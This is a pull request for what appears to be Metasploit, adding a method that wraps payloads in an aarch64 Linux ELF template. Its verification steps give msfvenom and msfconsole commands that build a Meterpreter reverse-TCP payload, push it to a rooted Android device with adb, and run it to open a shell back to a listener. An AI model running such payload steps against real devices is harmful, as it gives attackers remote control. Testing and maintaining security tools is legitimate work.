### PR TITLE
fix aarch64 to_linux_aarch64_elf

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1122,7 +1122,7 @@ require 'msf/core/exe/segment_appender'
     to_exe_elf(framework, opts, "template_x64_linux_dll.bin", code)
   end
 
-  # self.to_linux_mipsle_elf
+  # self.to_linux_armle_elf
   #
   # @param framework [Msf::Framework]
   # @param code       [String]
@@ -1131,6 +1131,17 @@ require 'msf/core/exe/segment_appender'
   # @return           [String] Returns an elf
   def self.to_linux_armle_elf(framework, code, opts = {})
     to_exe_elf(framework, opts, "template_armle_linux.bin", code)
+  end
+
+  # self.to_linux_aarch64_elf
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_aarch64_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
   end
 
   # self.to_linux_mipsle_elf


### PR DESCRIPTION
Quick fix for aarch64. The aarch64 elf template was added a while ago (and it works), but the method for using it is missing.
Note that similarly to the .so template, it only works when run as root. This is a known issue.
Verification:
- [x] Look at the code and land it :)
(or)
- [x] Get a rooted device and test it
```
msfconsole -qx "use exploit/multi/handler; set payload linux/aarch64/meterpreter_reverse_tcp; set lhost IP; set lport 4444; set ExitOnSession false; run"
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=ip LPORT=4444 -f elf -o elf
adb push elf /data/local/tmp/elf
adb shell 'chmod 755 /data/local/tmp/elf'
adb shell
su
/data/local/tmp/elf
```

